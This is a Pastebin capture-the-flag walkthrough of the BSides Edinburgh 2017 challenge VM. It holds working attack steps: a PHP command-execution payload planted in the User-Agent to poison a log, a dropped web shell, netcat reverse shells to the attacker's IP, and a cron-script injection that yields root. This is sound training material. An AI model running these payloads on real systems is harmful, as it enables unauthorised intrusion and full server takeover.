API tools faq
paste
Advertisement
Guest User

BSides Edinburgh 2017 CTF Walkthrough

a guest
Apr 17th, 2017
416
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.66 KB | None | 0 0
raw download clone embed print report
  1. BSides Edinburgh 2017 CTF Walkthrough - https://maze.pentest-challenge.co.uk/ - DigiP
  2.  
  3. Currently scanning: 192.168.7.0/16 | Screen View: Unique Hosts
  4.  
  5. 277 Captured ARP Req/Rep packets, from 4 hosts. Total size: 16620
  6. _____________________________________________________________________________
  7. IP At MAC Address Count Len MAC Vendor / Hostname
  8. -----------------------------------------------------------------------------
  9.  
  10. 192.168.1.89 08:00:27:31:b6:3a 4 240 PCS Systemtechnik GmbH
  11.  
  12. root@kali:~# nmap -sC -sV -T5 -v -p- --open -Pn --script vuln 192.168.1.89
  13.  
  14. PORT STATE SERVICE VERSION
  15. 80/tcp open http Apache httpd 2.4.10 ((Debian))
  16. |_http-csrf: Couldn't find any CSRF vulnerabilities.
  17. |_http-dombased-xss: Couldn't find any DOM based XSS.
  18. | http-enum:
  19. | /manager/: Possible admin folder
  20. | /test.html: Test page
  21. | /test.php: Test page
  22. | /robots.txt: Robots file
  23. |_ /uploads/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
  24. |_http-server-header: Apache/2.4.10 (Debian)
  25. | http-slowloris-check:
  26. | VULNERABLE:
  27. | Slowloris DOS attack
  28. | State: LIKELY VULNERABLE
  29. | IDs: CVE:CVE-2007-6750
  30. | Slowloris tries to keep many connections to the target web server open and hold
  31. | them open as long as possible. It accomplishes this by opening connections to
  32. | the target web server and sending a partial request. By doing so, it starves
  33. | the http server's resources causing Denial Of Service.
  34. |
  35. | Disclosure date: 2009-09-17
  36. | References:
  37. | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
  38. |_ http://ha.ckers.org/slowloris/
  39. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
  40. MAC Address: 08:00:27:31:B6:3A (Oracle VirtualBox virtual NIC)
  41.  
  42.  
  43. /test.php has an intesting message.
  44.  
  45. "Access Log (Cleared every 5 minutes):"
  46.  
  47. Lets try storing some PHP. The home page, reads our user agent. We add the following as our user agent,
  48.  
  49. <?php system("ls -lashR /") ?>
  50.  
  51. then visit /test.php
  52.  
  53. As suspected, we get a listing of all the files on the system (that the current user can read).
  54.  
  55. We find logs in http://192.168.1.89/9didkaskdhjdfh44/log.txt that contain our php code from our user agent.
  56.  
  57. We put the following in, to create our php payload in /uploads
  58.  
  59. curl -v --user-agent '<?php system($_GET["cmd"]) ?>' http://192.168.1.89/
  60.  
  61. /log.txt output:
  62.  
  63. 192.168.1.66:<?php system("cp /var/www/html/9didkaskdhjdfh44/log.txt /var/www/html/uploads/foo.php") ?><br />192.168.1.66:<?php system($_GET["cmd"]) ?><br />
  64.  
  65. Then navigate to test.php, and then /uploads/foo.php
  66.  
  67. We can now send commands to this page without playing with our user agent.
  68.  
  69. view-source:http://192.168.1.89/uploads/foo.php?cmd=cat%20/etc/passwd
  70. (Edit: I copied foo.php to shell2.php as first time around, I forgot about the logs copying, and it ended up wiping it out somehow with a blank file)
  71.  
  72. root:x:0:0:root:/root:/bin/bash
  73. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  74. bin:x:2:2:bin:/bin:/usr/sbin/nologin
  75. sys:x:3:3:sys:/dev:/usr/sbin/nologin
  76. sync:x:4:65534:sync:/bin:/bin/sync
  77. games:x:5:60:games:/usr/games:/usr/sbin/nologin
  78. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  79. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  80. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  81. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  82. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  83. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  84. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  85. backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
  86. list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
  87. irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
  88. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
  89. nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
  90. systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
  91. systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
  92. systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
  93. systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
  94. Debian-exim:x:104:109::/var/spool/exim4:/bin/false
  95. messagebus:x:105:110::/var/run/dbus:/bin/false
  96. statd:x:106:65534::/var/lib/nfs:/bin/false
  97. ctfuser:x:1000:1000:ctfuser,,,:/home/ctfuser:/bin/bash
  98. mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
  99. sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
  100. r00t::0:0:0wned:/home/r00t:/bin/sh
  101. r00t::0:0:0wned:/home/r00t:/bin/sh
  102.  
  103. There is an odd user(s) in /etc/passwd as "r00t" that is zeros, not o's
  104.  
  105. root:x:0:
  106. daemon:x:1:
  107. bin:x:2:
  108. sys:x:3:
  109. adm:x:4:
  110. tty:x:5:
  111. disk:x:6:
  112. lp:x:7:
  113. mail:x:8:
  114. news:x:9:
  115. uucp:x:10:
  116. man:x:12:
  117. proxy:x:13:
  118. kmem:x:15:
  119. dialout:x:20:
  120. fax:x:21:
  121. voice:x:22:
  122. cdrom:x:24:ctfuser
  123. floppy:x:25:ctfuser
  124. tape:x:26:
  125. sudo:x:27:
  126. audio:x:29:ctfuser
  127. dip:x:30:ctfuser
  128. www-data:x:33:
  129. backup:x:34:
  130. operator:x:37:
  131. list:x:38:
  132. irc:x:39:
  133. src:x:40:
  134. gnats:x:41:
  135. shadow:x:42:
  136. utmp:x:43:
  137. video:x:44:ctfuser
  138. sasl:x:45:
  139. plugdev:x:46:ctfuser
  140. staff:x:50:
  141. games:x:60:
  142. users:x:100:
  143. nogroup:x:65534:
  144. input:x:101:
  145. systemd-journal:x:102:
  146. systemd-timesync:x:103:
  147. systemd-network:x:104:
  148. systemd-resolve:x:105:
  149. systemd-bus-proxy:x:106:
  150. crontab:x:107:
  151. netdev:x:108:ctfuser
  152. Debian-exim:x:109:
  153. messagebus:x:110:
  154. mlocate:x:111:
  155. ssh:x:112:
  156. ctfuser:x:1000:
  157. ssl-cert:x:113:
  158. mysql:x:114:
  159.  
  160.  
  161. we start a reverse shell with /bin/nc to our machine.
  162.  
  163. We issue:
  164. cat /etc/issue;cat /etc/*ele*;uname -a
  165. The IP address assigned to the VM is \4{eth0}. Have fun!
  166.  
  167.  
  168. ██████╗ ███████╗███╗ ██╗████████╗███████╗███████╗████████╗
  169. ██╔══██╗██╔════╝████╗ ██║╚══██╔══╝██╔════╝██╔════╝╚══██╔══╝
  170. ██████╔╝█████╗ ██╔██╗ ██║ ██║ █████╗ ███████╗ ██║
  171. ██╔═══╝ ██╔══╝ ██║╚██╗██║ ██║ ██╔══╝ ╚════██║ ██║
  172. ██║ ███████╗██║ ╚████║ ██║ ███████╗███████║ ██║
  173. ╚═╝ ╚══════╝╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚══════╝ ╚═╝
  174.  
  175. ██████╗████████╗███████╗
  176. ██╔════╝╚══██╔══╝██╔════╝
  177. ██║ ██║ █████╗
  178. ██║ ██║ ██╔══╝
  179. ╚██████╗ ██║ ██║
  180. ╚═════╝ ╚═╝ ╚═╝
  181.  
  182. ██████╗ ██████╗ ██╗███████╗
  183. ╚════██╗██╔═████╗███║╚════██║
  184. █████╔╝██║██╔██║╚██║ ██╔╝
  185. ██╔═══╝ ████╔╝██║ ██║ ██╔╝
  186. ███████╗╚██████╔╝ ██║ ██║
  187. ╚══════╝ ╚═════╝ ╚═╝ ╚═╝
  188.  
  189.  
  190. The IP address assigned to the VM is \4{eth0}. Have fun!
  191.  
  192.  
  193. PRETTY_NAME="Debian GNU/Linux 8 (jessie)"
  194. NAME="Debian GNU/Linux"
  195. VERSION_ID="8"
  196. VERSION="8 (jessie)"
  197. ID=debian
  198. HOME_URL="http://www.debian.org/"
  199. SUPPORT_URL="http://www.debian.org/support"
  200. BUG_REPORT_URL="https://bugs.debian.org/"
  201. Linux ctf 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1 (2016-12-30) x86_64 GNU/Linux
  202.  
  203. I check netstat -antplu while in
  204. Active Internet connections (servers and established)
  205. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  206. tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
  207. tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
  208. tcp 0 0 192.168.1.89:36495 192.168.1.66:443 ESTABLISHED 19102/sh
  209. tcp6 0 0 ::1:25 :::* LISTEN -
  210. tcp6 0 0 :::80 :::* LISTEN -
  211. tcp6 1 0 192.168.1.89:80 192.168.1.66:50218 CLOSE_WAIT -
  212. udp 0 0 0.0.0.0:68 0.0.0.0:* -
  213. udp 0 0 0.0.0.0:1203 0.0.0.0:* -
  214. udp6 0 0 :::45629 :::* -
  215.  
  216. Lets get a proper tty
  217. python -c 'import pty; pty.spawn("/bin/sh")'
  218.  
  219. www-data@ctf:/home/ctfuser$ cat clearlog.sh
  220. cat clearlog.sh
  221. #!/bin/sh
  222. echo '' > /var/www/html/9didkaskdhjdfh44/log.txt
  223. www-data@ctf:/home/ctfuser$
  224.  
  225. We find the file that looks to be clearing the user agents from the log.txt file. If we can write to this file, we may be able to elevate to root.
  226.  
  227. So far we can't write to the ctfuser file, so I looked for some other scripts with bad perms, but none found.
  228. www-data@ctf:/home/ctfuser$ find / ! -ls 2>/dev/null | grep "\.sh$" | grep rwxrwxrwx
  229. 5430 0 lrwxrwxrwx 1 root root 21 Feb 2 14:40 /etc/rcS.d/S17bootmisc.sh -> ../init.d/bootmisc.sh
  230. 5372 0 lrwxrwxrwx 1 root root 21 Jan 28 03:20 /etc/rcS.d/S09mountall.sh -> ../init.d/mountall.sh
  231. 5338 0 lrwxrwxrwx 1 root root 32 Jan 28 03:20 /etc/rcS.d/S08checkroot-bootclean.sh -> ../init.d/checkroot-bootclean.sh
  232. 5481 0 lrwxrwxrwx 1 root root 20 Jan 28 03:20 /etc/rcS.d/S05hwclock.sh -> ../init.d/hwclock.sh
  233. 5368 0 lrwxrwxrwx 1 root root 20 Jan 28 03:20 /etc/rcS.d/S07checkfs.sh -> ../init.d/checkfs.sh
  234. 5278 0 lrwxrwxrwx 1 root root 24 Jan 28 03:19 /etc/rcS.d/S01mountkernfs.sh -> ../init.d/mountkernfs.sh
  235. 5376 0 lrwxrwxrwx 1 root root 31 Jan 28 03:20 /etc/rcS.d/S10mountall-bootclean.sh -> ../init.d/mountall-bootclean.sh
  236. 5429 0 lrwxrwxrwx 1 root root 31 Feb 2 14:40 /etc/rcS.d/S14mountnfs-bootclean.sh -> ../init.d/mountnfs-bootclean.sh
  237. 5332 0 lrwxrwxrwx 1 root root 21 Jan 28 03:19 /etc/rcS.d/S01hostname.sh -> ../init.d/hostname.sh
  238. 5336 0 lrwxrwxrwx 1 root root 22 Jan 28 03:20 /etc/rcS.d/S06checkroot.sh -> ../init.d/checkroot.sh
  239. 5334 0 lrwxrwxrwx 1 root root 26 Jan 28 03:20 /etc/rcS.d/S04mountdevsubfs.sh -> ../init.d/mountdevsubfs.sh
  240. 5428 0 lrwxrwxrwx 1 root root 21 Feb 2 14:40 /etc/rcS.d/S13mountnfs.sh -> ../init.d/mountnfs.sh
  241. 5442 0 lrwxrwxrwx 1 root root 22 Jan 28 03:37 /etc/rc6.d/K05umountnfs.sh -> ../init.d/umountnfs.sh
  242. 5480 0 lrwxrwxrwx 1 root root 20 Jan 28 03:37 /etc/rc6.d/K07hwclock.sh -> ../init.d/hwclock.sh
  243. 5441 0 lrwxrwxrwx 1 root root 22 Jan 28 03:37 /etc/rc0.d/K05umountnfs.sh -> ../init.d/umountnfs.sh
  244. 5478 0 lrwxrwxrwx 1 root root 20 Jan 28 03:37 /etc/rc0.d/K07hwclock.sh -> ../init.d/hwclock.sh
  245.  
  246. echo $PATH
  247. /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  248. www-data@ctf:/var/www/html/uploads$ env
  249. env
  250. APACHE_PID_FILE=/var/run/apache2/apache2.pid
  251. APACHE_RUN_USER=www-data
  252. APACHE_LOG_DIR=/var/log/apache2
  253. PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  254. PWD=/var/www/html/uploads
  255. APACHE_RUN_GROUP=www-data
  256. LANG=C
  257. SHLVL=1
  258. APACHE_LOCK_DIR=/var/lock/apache2
  259. APACHE_RUN_DIR=/var/run/apache2
  260. _=/usr/bin/env
  261. OLDPWD=/usr/share/gcc-4.9
  262. www-data@ctf:/var/www/html/uploads$
  263.  
  264.  
  265. find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null
  266.  
  267.  
  268. -rwxrwxrwx 1 root root 26597 Apr 4 11:02 /var/www/html/pentest_logo.jpg
  269. -rwxrwxrwx 1 root root 4301 Apr 4 11:02 /var/www/html/minimal.css
  270. -rwxrwxrwx 1 root root 1667 Apr 5 17:26 /var/www/html/index.php
  271. -rwxrwxrwx 1 root root 35 Apr 6 13:41 /var/www/html/robots.txt
  272. www-data@ctf:/var/www/html$
  273.  
  274. not looking like any of these will be useful. index.php is owned by root, but will always execute as www-data unless called specifically by root. We'd need a root cron to run it for us, where we could then inject code to pop a shell as root, but no cron jobs to execute this file as root exist.
  275.  
  276. Lost my shell at some point, fat fingered something probably.
  277. 192.168.1.89/uploads/shell2.php?cmd=nc 192.168.1.66 443 -e /bin/sh
  278. python -c 'import pty; pty.spawn("/bin/sh")';/bin/bash
  279.  
  280. After a day of playing, looking for a hole or priv escalation, I missed captain obvious with regard to ctfuser.
  281.  
  282. su ctfuser
  283. password? ctfuser
  284.  
  285. :( wah wah wah
  286.  
  287.  
  288. su ctfuser
  289. su ctfuser
  290. Password: ctfuser
  291.  
  292. ctfuser@ctf:/var/www/html/uploads$ id
  293. id
  294. uid=1000(ctfuser) gid=1000(ctfuser) groups=1000(ctfuser),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
  295. ctfuser@ctf:/var/www/html/uploads$ sudo -l
  296. sudo -l
  297. [sudo] password for ctfuser: ctfuser
  298.  
  299. Sorry, user ctfuser may not run sudo on ctf.
  300. You have new mail in /var/mail/ctfuser
  301. ctfuser@ctf:/var/www/html/uploads$
  302.  
  303. interesting info in /var/mail/ctfuser
  304.  
  305.  
  306. Subject: Cron <root@ctf> /root/scripts/rangen.sh
  307.  
  308. we start a local listener for nc -nlvp 4444 and then:
  309.  
  310. echo -e 'nc -nv 192.168.1.66 4444 -e /bin/bash' >> clearlog.sh
  311.  
  312. This script, if it's what I think it is, will run every 5 minutes, as stated on the test.php page we used to gain our www-data shell.
  313. If root starts this process, we should get a reverse shell as root.
  314.  
  315. 5 minutes later, and we have root!
  316.  
  317. python -c 'import pty; pty.spawn("/bin/sh")'
  318. # /bin/bash
  319. /bin/bash
  320. root@ctf:~# cd /root
  321. cd /root
  322. root@ctf:~# ls -la
  323. ls -la
  324. total 48
  325. drwx------ 2 root root 4096 Apr 6 12:57 .
  326. drwxr-xr-x 22 root root 4096 Jan 28 03:20 ..
  327. -rw------- 1 root root 183 Apr 6 13:55 .bash_history
  328. -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
  329. -r-x------ 1 root root 8096 Feb 24 21:32 flag-gen
  330. ---------- 1 root root 93 Apr 6 13:55 flag.txt
  331. -rw------- 1 root root 485 Feb 2 14:28 .mysql_history
  332. -rw------- 1 root root 27 Apr 6 13:55 .nano_history
  333. -rw-r--r-- 1 root root 140 Nov 19 2007 .profile
  334. ---------- 1 root root 451 Feb 2 13:43 public_key.pem
  335. -rw-r--r-- 1 root root 66 Jan 30 17:28 .selected_editor
  336. root@ctf:~# cat flag.txt
  337. cat flag.txt
  338. Please run the flag-gen binary in the /root/ folder to generate your unique flag. Well Done!
  339. root@ctf:~# ./flag-gen
  340. ./flag-gen
  341. Please supply your name as an argument.
  342. root@ctf:~# ./flag-gen xxDigiPxx
  343. ./flag-gen xxDigiPxx
  344. gAUfvCE50nYnABpAPClJtYdhQaLqB3n0oIb/pmaRxmOHm/8JM9nDPhPJrOUnnzUcHfHR5ewAIPGB
  345. EGVjsvPd7YYG9Do16xyTNbP5tfENe50OA7av4kkHUvYOhVgjQfn+RcCYJDUAj3xkA5nwg1DnIBjP
  346. WQcseAgMxnaFE50YJYEQAolWalanygEyNJUp/L2CQODR/KSgdacWBSjPL+zdCtbF5YPjsVHvlijX
  347. WJcNuIs7wlHysMsUadMahRffgSYhv0+gUs9VVT0CB7/2kqlg7CTivS9btjvXicrAN4Fv2Ma2l39I
  348. 7SWX6Yt3I/7U4VJXNoVSYUeBwrTTiCKu2dqgQA==
  349. root@ctf:~#
  350.  
  351. During this CTF, I had tried way too many things, looking for various exploits for priv escalation and came up short. At the end of the day,
  352. the simplest of things came to bite me in the ass, as using the username as a password was something I should have tried as soon as I had
  353. gained my first tty session. Just goes to show that somethings it's the little things we neglect that have the biggest impact. - DigiP
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!